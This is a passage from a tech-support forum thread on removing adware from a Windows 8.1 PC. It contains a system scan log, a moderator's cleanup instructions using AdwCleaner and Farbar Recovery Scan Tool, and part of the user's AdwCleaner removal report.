FF - HKLM\Software\MozillaPlugins\@intel-webapi.intel.com/Intel WebAPI ipt;version=2.1.42: C:\Program Files (x86)\Intel\Intel® Management Engine Components\IPT\npIntelWebAPIIPT.dll (Intel Corporation)
FF - HKLM\Software\MozillaPlugins\@intel-webapi.intel.com/Intel WebAPI updater: C:\Program Files (x86)\Intel\Intel® Management Engine Components\IPT\npIntelWebAPIUpdater.dll (Intel Corporation)
FF - HKLM\Software\MozillaPlugins\@java.com/DTPlugin,version=10.67.2: C:\Program Files (x86)\Java\jre7\bin\dtplugin\npDeployJava1.dll (Oracle Corporation)
FF - HKLM\Software\MozillaPlugins\@java.com/JavaPlugin,version=10.67.2: C:\Program Files (x86)\Java\jre7\bin\plugin2\npjp2.dll (Oracle Corporation)
FF - HKLM\Software\MozillaPlugins\@mcafee.com/MSC,version=10: c:\PROGRA~2\mcafee\msc\NPMCSN~1.DLL ()
FF - HKLM\Software\MozillaPlugins\@microsoft.com/WLPG,version=16.4.3505.0912: C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF - HKLM\Software\MozillaPlugins\@tools.google.com/Google Update;version=3: C:\Program Files (x86)\Google\Update\1.3.25.5\npGoogleUpdate3.dll (Google Inc.)
FF - HKLM\Software\MozillaPlugins\@tools.google.com/Google Update;version=9: C:\Program Files (x86)\Google\Update\1.3.25.5\npGoogleUpdate3.dll (Google Inc.)
FF - HKLM\Software\MozillaPlugins\Adobe Reader: C:\Program Files (x86)\Adobe\Reader 11.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.)
FF - HKCU\Software\MozillaPlugins\@Skype Limited.com/Facebook Video Calling Plugin: C:\Users\Nick\AppData\Local\Facebook\Video\Skype\npFacebookVideoCalling.dll (Skype Limited)
 
FF - HKEY_LOCAL_MACHINE\software\mozilla\Mozilla Firefox 32.0.3\extensions\\Components: C:\Program Files (x86)\Mozilla Firefox\components
FF - HKEY_LOCAL_MACHINE\software\mozilla\Mozilla Firefox 32.0.3\extensions\\Plugins: C:\Program Files (x86)\Mozilla Firefox\plugins
FF - HKEY_LOCAL_MACHINE\software\mozilla\Thunderbird\Extensions\\[email protected]: C:\Program Files\McAfee\MSK [2014/02/09 12:38:35 | 000,000,000 | ---D | M]
FF - HKEY_CURRENT_USER\software\mozilla\Firefox\Extensions\\{e4f94d1e-2f53-401e-8885-681602c0ddd8}: C:\ProgramData\McAfee Security Scan\Extensions\{e4f94d1e-2f53-401e-8885-681602c0ddd8}.xpi [2014/04/04 05:36:14 | 000,010,691 | ---- | M] ()
FF - HKEY_CURRENT_USER\software\mozilla\Mozilla Firefox 32.0.3\extensions\\Components: C:\Program Files (x86)\Mozilla Firefox\components
FF - HKEY_CURRENT_USER\software\mozilla\Mozilla Firefox 32.0.3\extensions\\Plugins: C:\Program Files (x86)\Mozilla Firefox\plugins
 
[2014/03/04 04:36:13 | 000,000,000 | ---D | M] (No name found) -- C:\Users\Nick\AppData\Roaming\mozilla\Extensions
[2014/03/04 04:36:13 | 000,000,000 | ---D | M] (No name found) -- C:\Users\Nick\AppData\Roaming\mozilla\Extensions\[email protected]
[2014/11/11 14:31:09 | 000,000,000 | ---D | M] (No name found) -- C:\Users\Nick\AppData\Roaming\mozilla\Firefox\Profiles\1hcaal8x.default\extensions
[2014/11/09 10:16:08 | 000,000,000 | ---D | M] (DiscountLocator) -- C:\Users\Nick\AppData\Roaming\mozilla\Firefox\Profiles\1hcaal8x.default\extensions\[email protected]
[2014/10/20 15:54:50 | 000,016,417 | ---- | M] () (No name found) -- C:\Users\Nick\AppData\Roaming\mozilla\firefox\profiles\1hcaal8x.default\extensions\{C7928956-827D-4649-A234-BB758377C005}.xpi
[2014/11/12 12:37:09 | 000,001,074 | ---- | M] () -- C:\Users\Nick\AppData\Roaming\mozilla\firefox\profiles\1hcaal8x.default\searchplugins\trovi-search.xml
[2014/09/24 17:31:34 | 000,000,000 | ---D | M] (No name found) -- C:\Program Files (x86)\Mozilla Firefox\extensions
[2014/09/24 17:31:34 | 000,000,000 | ---D | M] () -- C:\Program Files (x86)\Mozilla Firefox\extensions\[email protected]
[2014/09/24 17:31:33 | 000,000,000 | ---D | M] (No name found) -- C:\Program Files (x86)\Mozilla Firefox\browser\extensions
[2014/09/24 17:31:39 | 000,000,000 | ---D | M] (Default) -- C:\Program Files (x86)\Mozilla Firefox\browser\extensions\{972ce4c6-7e08-4474-a285-3208198ce6fd}
 
========== Chrome  ==========
 
 
O1 HOSTS File: ([2013/08/22 08:25:41 | 000,000,824 | ---- | M]) - C:\Windows\SysNative\drivers\etc\hosts
O2:[b]64bit:
- BHO: (CIESpeechBHO Class) - {8D10F6C4-0E01-4BD4-8601-11AC1FDF8126} - C:\Program Files (x86)\Dell Wireless\Bluetooth Suite\IEPlugIn.dll (Qualcomm Atheros Commnucations)
O2:[b]64bit:
- BHO: (Skype Click to Call for Internet Explorer) - {AE805869-2E5C-4ED4-8F7B-F1F7851A4497} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer x64\SkypeIEPlugin.dll (Microsoft Corporation)
O2:[b]64bit:
- BHO: (savernet) - {f1bf4d17-a17e-4311-ba3a-ec4384e7ee35} - C:\ProgramData\savernet\sDW70t8VQ2RNoZ.x64.dll File not found
O2 - BHO: (MSS+ Identifier) - {0E8A89AD-95D7-40EB-8D9D-083EF7066A01} - C:\Program Files\McAfee Security Scan\3.8.150\McAfeeMSS_IE.dll (McAfee, Inc.)
O2 - BHO: (Java™ Plug-In SSV Helper) - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files (x86)\Java\jre7\bin\ssv.dll (Oracle Corporation)
O2 - BHO: (Skype Click to Call for Internet Explorer) - {AE805869-2E5C-4ED4-8F7B-F1F7851A4497} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll (Microsoft Corporation)
O2 - BHO: (Java™ Plug-In 2 SSV Helper) - {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Program Files (x86)\Java\jre7\bin\jp2ssv.dll (Oracle Corporation)
O2 - BHO: (savernet) - {f1bf4d17-a17e-4311-ba3a-ec4384e7ee35} - C:\ProgramData\savernet\sDW70t8VQ2RNoZ.dll File not found
O3:[b]64bit:
- HKLM\..\Toolbar: (no name) - 10 - No CLSID value found.
O3 - HKLM\..\Toolbar: (no name) - 10 - No CLSID value found.
O4:[b]64bit:
- HKLM..\Run: [BtPreLoad] C:\Program Files (x86)\Dell Wireless\Bluetooth Suite\BtPreLoad.exe ()
O4:[b]64bit:
- HKLM..\Run: [HotKeysCmds] C:\WINDOWS\SysNative\hkcmd.exe (Intel Corporation)
O4:[b]64bit:
- HKLM..\Run: [IgfxTray] C:\WINDOWS\SysNative\igfxtray.exe (Intel Corporation)
O4:[b]64bit:
- HKLM..\Run: [Persistence] C:\WINDOWS\SysNative\igfxpers.exe (Intel Corporation)
O4:[b]64bit:
- HKLM..\Run: [QuickSet] c:\Program Files\Dell\QuickSet\quickset.exe (Dell Inc.)
O4:[b]64bit:
- HKLM..\Run: [RtHDVBg] C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe (Realtek Semiconductor)
O4:[b]64bit:
- HKLM..\Run: [RtHDVBg_PushButton] C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe (Realtek Semiconductor)
O4:[b]64bit:
- HKLM..\Run: [RTHDVCPL] C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe (Realtek Semiconductor)
O4:[b]64bit:
- HKLM..\Run: [SpywareClearShield] C:\Program Files (x86)\Spyware Clear\SpywareClearShield.exe File not found
O4:[b]64bit:
- HKLM..\Run: [SpywareClearUpdater] C:\Program Files (x86)\Spyware Clear\SpywareClearUpdate.exe File not found
O4 - HKLM..\Run: [IAStorIcon] C:\Program Files (x86)\Intel\Intel® Rapid Storage Technology\IAStorIconLaunch.exe (Intel Corporation)
O4 - HKLM..\Run: [mcpltui_exe] C:\Program Files\McAfee.com\Agent\mcagent.exe (McAfee, Inc.)
O4 - HKLM..\Run: [RemoteControl10] C:\Program Files (x86)\CyberLink\PowerDVD10\PDVD10Serv.exe (CyberLink Corp.)
O4 - HKCU..\Run: [Driver Support] C:\Program Files (x86)\Driver Support\Driver Support\DriverSupport.exe (PC Drivers Headquarters)
O4 - HKCU..\Run: [Facebook Update] C:\Users\Nick\AppData\Local\Facebook\Update\FacebookUpdate.exe (Facebook Inc.)
O4 - HKCU..\Run: [Spotify] C:\Users\Nick\AppData\Roaming\Spotify\Spotify.exe (Spotify Ltd)
O4 - HKCU..\Run: [Spotify Web Helper] C:\Users\Nick\AppData\Roaming\Spotify\Data\SpotifyWebHelper.exe (Spotify Ltd)
O4 - HKCU..\Run: [TomTomHOME.exe] C:\Program Files (x86)\TomTom HOME 2\TomTomHOMERunner.exe (TomTom)
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoActiveDesktopChanges = 1
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoActiveDesktop = 1
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoControlPanel = 0
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run: BtvStack = "C:\Program Files (x86)\Dell Wireless\Bluetooth Suite\BtvStack.exe" (Qualcomm Atheros Commnucations)
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System: ConsentPromptBehaviorAdmin = 5
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System: EnableCursorSuppression = 1
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System: ConsentPromptBehaviorUser = 3
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System: DisableCAD = 1
O9:[b]64bit:
- Extra 'Tools' menuitem : Send by Bluetooth to - {7815BE26-237D-41A8-A98F-F7BD75F71086} - C:\Program Files (x86)\Dell Wireless\Bluetooth Suite\IEPlugIn.dll (Qualcomm Atheros Commnucations)
O9:[b]64bit:
- Extra Button: Skype Click to Call settings - {898EA8C8-E7FF-479B-8935-AEC46303B9E5} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer x64\SkypeIEPlugin.dll (Microsoft Corporation)
O9 - Extra Button: Skype Click to Call settings - {898EA8C8-E7FF-479B-8935-AEC46303B9E5} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll (Microsoft Corporation)
O10:[b]64bit:
- NameSpace_Catalog5\Catalog_Entries64\000000000008 [] - C:\Program Files\Bonjour\mdnsNSP.dll (Apple Inc.)
O10 - NameSpace_Catalog5\Catalog_Entries\000000000008 [] - C:\Program Files (x86)\Bonjour\mdnsNSP.dll (Apple Inc.)
O13[b]64bit:
- gopher Prefix: missing
O13 - gopher Prefix: missing
O17 - HKLM\System\CCS\Services\Tcpip\Parameters: DhcpNameServer = 192.168.2.1
O17 - HKLM\System\CCS\Services\Tcpip\Parameters\Interfaces\{7EB47A42-5443-4053-921F-9E1DFB54C3FA}: DhcpNameServer = 192.168.2.1
O18:[b]64bit:
- Protocol\Handler\skypec2c {91774881-D725-4E58-B298-07617B9B86A8} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer x64\SkypeIEPlugin.dll (Microsoft Corporation)
O18:[b]64bit:
- Protocol\Handler\wlpg - No CLSID value found
O18 - Protocol\Handler\skypec2c {91774881-D725-4E58-B298-07617B9B86A8} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll (Microsoft Corporation)
O18:[b]64bit:
- Protocol\Filter\application/x-mfe-ipt {3EF5086B-5478-4598-A054-786C45D75692} - c:\Program Files\mcafee\msc\McSnIePl64.dll (McAfee, Inc.)
O18 - Protocol\Filter\application/x-mfe-ipt {3EF5086B-5478-4598-A054-786C45D75692} - c:\Program Files (x86)\McAfee\msc\McSnIePl.dll (McAfee, Inc.)
O20:[b]64bit:
- AppInit_DLLs: (C:\PROGRA~2\SearchProtect\SearchProtect\bin\SPVC64Loader.dll) - C:\Program Files (x86)\SearchProtect\SearchProtect\bin\SPVC64Loader.dll (Client Connect LTD)
O20 - AppInit_DLLs: (C:\PROGRA~2\SearchProtect\SearchProtect\bin\SPVC32Loader.dll) - C:\Program Files (x86)\SearchProtect\SearchProtect\bin\SPVC32Loader.dll (Client Connect LTD)
O20:[b]64bit:
- HKLM Winlogon: Shell - (explorer.exe) - C:\WINDOWS\explorer.exe (Microsoft Corporation)
O20:[b]64bit:
- HKLM Winlogon: UserInit - (C:\Windows\system32\userinit.exe) - C:\Windows\SysNative\userinit.exe (Microsoft Corporation)
O20 - HKLM Winlogon: Shell - (explorer.exe) - C:\WINDOWS\SysWow64\explorer.exe (Microsoft Corporation)
O20 - HKLM Winlogon: UserInit - (userinit.exe) - C:\WINDOWS\SysWow64\userinit.exe (Microsoft Corporation)
O20:[b]64bit:
- Winlogon\Notify\igfxcui: DllName - (igfxdev.dll) - C:\WINDOWS\SysNative\igfxdev.dll (Intel Corporation)
O21:[b]64bit:
- SSODL: WebCheck - {E6FB5E20-DE35-11CF-9C87-00AA005127ED} - No CLSID value found.
O21 - SSODL: WebCheck - {E6FB5E20-DE35-11CF-9C87-00AA005127ED} - No CLSID value found.
O30 - LSA: Security Packages - (livessp) -  File not found
O32 - HKLM CDRom: AutoRun - 1
O34 - HKLM BootExecute: (autocheck autochk *)
O35:[b]64bit: - HKLM\..comfile [open] -- "%1" %*
O35:[b]64bit: - HKLM\..exefile [open] -- "%1" %*
O35 - HKLM\..comfile [open] -- "%1" %*
O35 - HKLM\..exefile [open] -- "%1" %*
O37:[b]64bit: - HKLM\...com [@ = comfile] -- "%1" %*
O37:[b]64bit: - HKLM\...exe [@ = exefile] -- "%1" %*
O37 - HKLM\...com [@ = comfile] -- "%1" %*
O37 - HKLM\...exe [@ = exefile] -- "%1" %*
O38 - SubSystems\\Windows: (ServerDll=winsrv:UserServerDllInitialization,3)
O38 - SubSystems\\Windows: (ServerDll=sxssrv,4)
 
========== Files/Folders - Created Within 30 Days ==========
 
[2014/11/12 09:20:05 | 000,000,000 | ---D | C] -- C:\Users\Nick\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VOPackage
[2014/11/12 09:20:04 | 000,000,000 | ---D | C] -- C:\Users\Nick\AppData\Roaming\VOPackage
[2014/11/12 09:19:27 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\24x7Help
[2014/11/12 09:18:37 | 000,000,000 | ---D | C] -- C:\Users\Nick\AppData\Local\SearchProtect
[2014/11/12 09:18:13 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\ORBTR
[2014/11/12 09:18:10 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\SearchProtect
[2014/11/11 14:49:18 | 000,000,000 | ---D | C] -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\McAfee
[2014/11/11 14:45:10 | 000,000,000 | R--D | C] -- C:\Users\Nick\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\BT Devices
[2014/11/11 14:40:40 | 000,000,000 | ---D | C] -- C:\ProgramData\374311380
[2014/11/11 14:37:00 | 000,000,000 | -HSD | C] -- C:\Config.Msi
[2014/11/09 10:16:57 | 000,000,000 | ---D | C] -- C:\ProgramData\WorldWideWebCoupon
[2014/10/27 09:55:47 | 000,000,000 | R--D | C] -- C:\Users\Nick\Documents\Notes
[2014/10/23 18:33:34 | 000,000,000 | ---D | C] -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Skype
[2014/10/23 18:33:34 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\Common Files\Skype
[2014/10/23 18:27:39 | 000,000,000 | ---D | C] -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\iTunes
[2014/10/23 18:26:54 | 000,000,000 | ---D | C] -- C:\Program Files\iPod
[2014/10/23 18:26:49 | 000,000,000 | ---D | C] -- C:\Program Files\iTunes
[2014/10/23 18:26:49 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\iTunes
[2014/10/23 18:26:49 | 000,000,000 | ---D | C] -- C:\ProgramData\E1864A66-75E3-486a-BD95-D1B7D99A84A7
[2014/10/23 18:17:17 | 000,000,000 | ---D | C] -- C:\Users\Nick\AppData\Local\LogMeIn Rescue Applet
[2014/10/22 19:25:21 | 000,000,000 | ---D | C] -- C:\Users\Nick\AppData\Local\Spotify
[2014/10/22 19:24:55 | 000,000,000 | ---D | C] -- C:\Users\Nick\AppData\Roaming\Spotify
[1 C:\WINDOWS\*.tmp files -> C:\WINDOWS\*.tmp -> ]
[1 C:\Users\Nick\AppData\Local\*.tmp files -> C:\Users\Nick\AppData\Local\*.tmp -> ]
 
========== Files - Modified Within 30 Days ==========
 
[2014/11/12 13:13:00 | 000,000,376 | ---- | M] () -- C:\WINDOWS\tasks\CIMT_S-1-5-21-638231278-2563524819-3576094203-1001.job
[2014/11/12 13:12:01 | 000,000,924 | ---- | M] () -- C:\WINDOWS\tasks\GoogleUpdateTaskMachineUA.job
[2014/11/12 12:54:01 | 000,000,942 | ---- | M] () -- C:\WINDOWS\tasks\FacebookUpdateTaskUserS-1-5-21-638231278-2563524819-3576094203-1001UA.job
[2014/11/12 12:48:00 | 000,000,830 | ---- | M] () -- C:\WINDOWS\tasks\Adobe Flash Player Updater.job
[2014/11/12 12:25:22 | 000,067,584 | --S- | M] () -- C:\WINDOWS\bootstat.dat
[2014/11/11 14:50:36 | 000,865,408 | ---- | M] () -- C:\WINDOWS\SysNative\PerfStringBackup.INI
[2014/11/11 14:50:36 | 000,732,688 | ---- | M] () -- C:\WINDOWS\SysNative\perfh009.dat
[2014/11/11 14:50:36 | 000,136,262 | ---- | M] () -- C:\WINDOWS\SysNative\perfc009.dat
[2014/11/11 14:45:20 | 000,000,920 | ---- | M] () -- C:\WINDOWS\tasks\GoogleUpdateTaskMachineCore.job
[2014/11/11 14:43:26 | 268,435,456 | -HS- | M] () -- C:\swapfile.sys
[2014/11/11 14:43:25 | 3336,376,320 | -HS- | M] () -- C:\hiberfil.sys
[2014/11/11 14:01:55 | 000,129,752 | ---- | M] (Malwarebytes Corporation) -- C:\WINDOWS\SysNative\drivers\MBAMSwissArmy.sys
[2014/11/11 13:50:01 | 000,000,303 | ---- | M] () -- C:\Users\Nick\Desktop\Control Panel.lnk
[2014/11/09 09:54:00 | 000,000,920 | ---- | M] () -- C:\WINDOWS\tasks\FacebookUpdateTaskUserS-1-5-21-638231278-2563524819-3576094203-1001Core.job
[2014/10/27 10:06:23 | 000,000,515 | ---- | M] () -- C:\Users\Nick\Documents\Moms Cover Letter.rtf
[2014/10/23 18:27:39 | 000,001,797 | ---- | M] () -- C:\Users\Public\Desktop\iTunes.lnk
[2014/10/22 19:25:20 | 000,001,850 | ---- | M] () -- C:\Users\Nick\Desktop\Spotify.lnk
[2014/10/17 20:08:47 | 000,377,256 | ---- | M] () -- C:\WINDOWS\SysNative\FNTCACHE.DAT
[1 C:\WINDOWS\*.tmp files -> C:\WINDOWS\*.tmp -> ]
[1 C:\Users\Nick\AppData\Local\*.tmp files -> C:\Users\Nick\AppData\Local\*.tmp -> ]
 
========== Files Created - No Company Name ==========
 
[2014/11/11 13:50:01 | 000,000,303 | ---- | C] () -- C:\Users\Nick\Desktop\Control Panel.lnk
[2014/10/27 10:06:23 | 000,000,515 | ---- | C] () -- C:\Users\Nick\Documents\Moms Cover Letter.rtf
[2014/10/23 18:27:39 | 000,001,797 | ---- | C] () -- C:\Users\Public\Desktop\iTunes.lnk
[2014/10/23 18:17:21 | 000,002,264 | ---- | C] () -- C:\Users\Nick\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Asurion Insurance Services.lnk
[2014/10/22 19:25:20 | 000,001,850 | ---- | C] () -- C:\Users\Nick\Desktop\Spotify.lnk
[2014/10/22 19:25:20 | 000,001,836 | ---- | C] () -- C:\Users\Nick\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Spotify.lnk
[2014/10/15 05:03:00 | 000,388,729 | ---- | C] () -- C:\WINDOWS\SysNative\ApnDatabase.xml
[2014/08/31 20:12:01 | 000,000,067 | ---- | C] () -- C:\Users\Nick\AppData\Roaming\WB.CFG
[2014/08/19 21:31:14 | 000,000,258 | RHS- | C] () -- C:\ProgramData\ntuser.pol
[2014/04/29 15:20:09 | 000,002,255 | ---- | C] () -- C:\WINDOWS\SysWow64\WimBootCompress.ini
[2014/03/18 09:52:26 | 000,103,936 | ---- | C] () -- C:\WINDOWS\SysWow64\OEMLicense.dll
[2013/12/21 01:02:44 | 000,280,064 | ---- | C] () -- C:\WINDOWS\SysWow64\igdmd32.dll
[2013/12/21 01:02:40 | 000,182,272 | ---- | C] () -- C:\WINDOWS\SysWow64\igdde32.dll
[2013/12/21 01:02:40 | 000,142,848 | ---- | C] () -- C:\WINDOWS\SysWow64\igdail32.dll
[2013/11/17 00:03:21 | 000,880,342 | ---- | C] () -- C:\WINDOWS\SysWow64\PerfStringBackup.INI
[2013/08/22 10:36:43 | 000,215,943 | ---- | C] () -- C:\WINDOWS\SysWow64\dssec.dat
[2013/08/22 10:36:42 | 000,000,741 | ---- | C] () -- C:\WINDOWS\SysWow64\NOISE.DAT
[2013/08/22 09:46:23 | 000,067,584 | --S- | C] () -- C:\WINDOWS\bootstat.dat
[2013/08/22 02:01:23 | 000,043,131 | ---- | C] () -- C:\WINDOWS\mib.bin
[2013/08/21 22:32:36 | 000,046,080 | ---- | C] () -- C:\WINDOWS\SysWow64\BWContextHandler.dll
[2013/08/21 18:55:20 | 000,364,544 | ---- | C] () -- C:\WINDOWS\SysWow64\msjetoledb40.dll
[2013/08/21 18:52:39 | 000,673,088 | ---- | C] () -- C:\WINDOWS\SysWow64\mlang.dat
 
========== ZeroAccess Check ==========
 
[2014/05/17 20:31:40 | 000,000,227 | RHS- | M] () -- C:\WINDOWS\assembly\Desktop.ini
 
[HKEY_CURRENT_USER\Software\Classes\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32] /64
 
[HKEY_CURRENT_USER\Software\Classes\Wow6432node\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32]
 
[HKEY_CURRENT_USER\Software\Classes\clsid\{fbeb8a05-beee-4442-804e-409d6c4515e9}\InProcServer32] /64
 
[HKEY_CURRENT_USER\Software\Classes\Wow6432node\clsid\{fbeb8a05-beee-4442-804e-409d6c4515e9}\InProcServer32]
 
[HKEY_LOCAL_MACHINE\Software\Classes\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32] /64
"" = C:\Windows\SysNative\shell32.dll -- [2014/08/15 23:08:41 | 021,195,616 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Apartment
 
[HKEY_LOCAL_MACHINE\Software\Wow6432Node\Classes\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32]
"" = %SystemRoot%\system32\shell32.dll -- [2014/08/15 22:16:40 | 018,722,600 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Apartment
 
[HKEY_LOCAL_MACHINE\Software\Classes\clsid\{5839FCA9-774D-42A1-ACDA-D6A79037F57F}\InProcServer32] /64
"" = C:\Windows\SysNative\wbem\fastprox.dll -- [2013/08/22 04:49:49 | 000,921,088 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Free
 
[HKEY_LOCAL_MACHINE\Software\Wow6432Node\Classes\clsid\{5839FCA9-774D-42A1-ACDA-D6A79037F57F}\InProcServer32]
"" = %systemroot%\system32\wbem\fastprox.dll -- [2013/08/21 21:45:10 | 000,691,712 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Free
 
[HKEY_LOCAL_MACHINE\Software\Classes\clsid\{F3130CDB-AA52-4C3A-AB32-85FFC23AF9C1}\InProcServer32] /64
"" = C:\Windows\SysNative\wbem\wbemess.dll -- [2013/08/22 04:45:17 | 000,483,840 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Both
 
[HKEY_LOCAL_MACHINE\Software\Wow6432Node\Classes\clsid\{F3130CDB-AA52-4C3A-AB32-85FFC23AF9C1}\InProcServer32]
 
========== LOP Check ==========
 
[2014/10/24 19:15:49 | 000,000,000 | ---D | M] -- C:\Users\Nick\AppData\Roaming\.minecraft
[2014/08/21 06:53:19 | 000,000,000 | ---D | M] -- C:\Users\Nick\AppData\Roaming\Compete
[2014/05/17 20:38:58 | 000,000,000 | ---D | M] -- C:\Users\Nick\AppData\Roaming\Elgato
[2014/11/11 14:37:00 | 000,000,000 | ---D | M] -- C:\Users\Nick\AppData\Roaming\ISpeedPC
[2014/02/08 18:00:44 | 000,000,000 | ---D | M] -- C:\Users\Nick\AppData\Roaming\Leadertech
[2014/05/17 20:36:07 | 000,000,000 | ---D | M] -- C:\Users\Nick\AppData\Roaming\OBS
[2014/11/11 14:41:21 | 000,000,000 | ---D | M] -- C:\Users\Nick\AppData\Roaming\Open Download Manager
[2014/07/15 15:46:04 | 000,000,000 | ---D | M] -- C:\Users\Nick\AppData\Roaming\PCDr
[2014/04/24 17:46:10 | 000,000,000 | ---D | M] -- C:\Users\Nick\AppData\Roaming\Serif
[2014/11/11 14:45:45 | 000,000,000 | ---D | M] -- C:\Users\Nick\AppData\Roaming\Spotify
[2014/03/04 04:36:12 | 000,000,000 | ---D | M] -- C:\Users\Nick\AppData\Roaming\TomTom
[2014/11/12 09:20:05 | 000,000,000 | ---D | M] -- C:\Users\Nick\AppData\Roaming\VOPackage
[2014/06/17 21:09:29 | 000,000,000 | ---D | M] -- C:\Users\Nick\AppData\Roaming\WebApp
 
========== Purity Check ==========
 
 
 
========== Alternate Data Streams ==========
 
@Alternate Data Stream - 94 bytes -> C:\Users\Nick\OneDrive:ms-properties
@Alternate Data Stream - 57 bytes -> C:\Users\Nick\SkyDrive:ms-properties

< End of report >


  • 0

Advertisements


#2
Essexboy

Essexboy

    GeekU Moderator

  • Retired Staff
  • 69,964 posts
Hi there, lets put an end to this

Please download AdwCleaner by Xplode onto your desktop.
  • Close all open programs and internet browsers.
  • Double click on AdwCleaner.exe to run the tool.
  • Click on Scan.
  • After the scan is complete click on "Clean"
  • Confirm each time with Ok.
  • Your computer will be rebooted automatically. A text file will open after the restart.
  • Please post the content of that logfile with your next answer.
  • You can find the logfile at C:\AdwCleaner[S1].txt as well.
THEN

Please download Farbar Recovery Scan Tool and save it to your Desktop.

Note: You need to run the version compatible with your system. If you are not sure which version applies to your system download both of them and try to run them. Only one of them will run on your system, that will be the right version.
  • Right click to run as administrator (XP users click run after receipt of Windows Security Warning - Open File). When the tool opens click Yes to disclaimer.
  • Select additions at the bottom
  • Press Scan button.
    frst.JPG
  • It will produce a log called FRST.txt in the same directory the tool is run from.
  • Please attach both logs generated.

  • 0

#3
miszeewithkids!

miszeewithkids!

    Member

  • Topic Starter
  • Member
  • PipPip
  • 35 posts

# AdwCleaner v4.101 - Report created 12/11/2014 at 14:11:41
# Updated 09/11/2014 by Xplode
# Database : 2014-11-12.1 [Live]
# Operating System : Windows 8.1  (64 bits)
# Username : Nick - NICKS-PC
# Running from : C:\Users\Nick\Desktop\Spyware Removers\adwcleaner_4.101.exe
# Option : Clean

***** [ Services ] *****

Service Deleted : CltMngSvc
Service Deleted : SPPD
Service Deleted : Orbiter

***** [ Files / Folders ] *****

Folder Deleted : C:\ProgramData\374311380
Folder Deleted : C:\ProgramData\WorldWideWebCoupon
Folder Deleted : C:\ProgramData\Driver Support
Folder Deleted : C:\ProgramData\f0d93ac73c4bc5d2
Folder Deleted : C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Driver Support
Folder Deleted : C:\Program Files (x86)\SearchProtect
Folder Deleted : C:\Program Files (x86)\Driver Support
Folder Deleted : C:\Program Files (x86)\ORBTR
Folder Deleted : C:\Program Files\TermTutor
Folder Deleted : C:\Users\Nick\AppData\Local\SearchProtect
Folder Deleted : C:\Users\Nick\AppData\Local\CrashRpt
Folder Deleted : C:\Users\Nick\AppData\Local\Temp\SmarterPower
Folder Deleted : C:\Users\Nick\AppData\Local\Temp\AppEnable
Folder Deleted : C:\Users\Nick\AppData\Roaming\VOPackage
Folder Deleted : C:\Users\Nick\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VOPackage
Folder Deleted : C:\Users\Nick\AppData\Roaming\Mozilla\Firefox\Profiles\1hcaal8x.default\Extensions\[email protected]
Folder Deleted : C:\Users\Nick\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\kfgaibfbmkjgmimhbbaikfnpkkjkpoan
Folder Deleted : C:\Users\Nick\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\mnanplinmmnjhobaliikmelmmjpoogkb
Folder Deleted : C:\Users\Nick\AppData\Local\Comodo\Dragon\User Data\Default\Extensions\edjkooiccbgjhlpfhkknkjhfpmjkmelk
File Deleted : C:\Users\Nick\AppData\Roaming\Mozilla\Firefox\Profiles\1hcaal8x.default\searchplugins\trovi-search.xml
File Deleted : C:\Users\Nick\AppData\Roaming\Mozilla\Firefox\Profiles\1hcaal8x.default\user.js

***** [ Scheduled Tasks ] *****

Task Deleted : Driver Support-RTMRules
Task Deleted : Driver Support-RTMScan
Task Deleted : Driver Support-RTMUpdater
Task Deleted : LaunchSignup

***** [ Shortcuts ] *****

***** [ Registry ] *****

Key Deleted : HKLM\SOFTWARE\Classes\AppID\{9CB2CD61-FFA0-406C-9D2D-8FDE6F4A4D8A}
Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{1AA60054-57D9-4F99-9A55-D0FBFBE7ECD3}
Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{459DD0F7-0D55-D3DC-67BC-E6BE37E9D762}
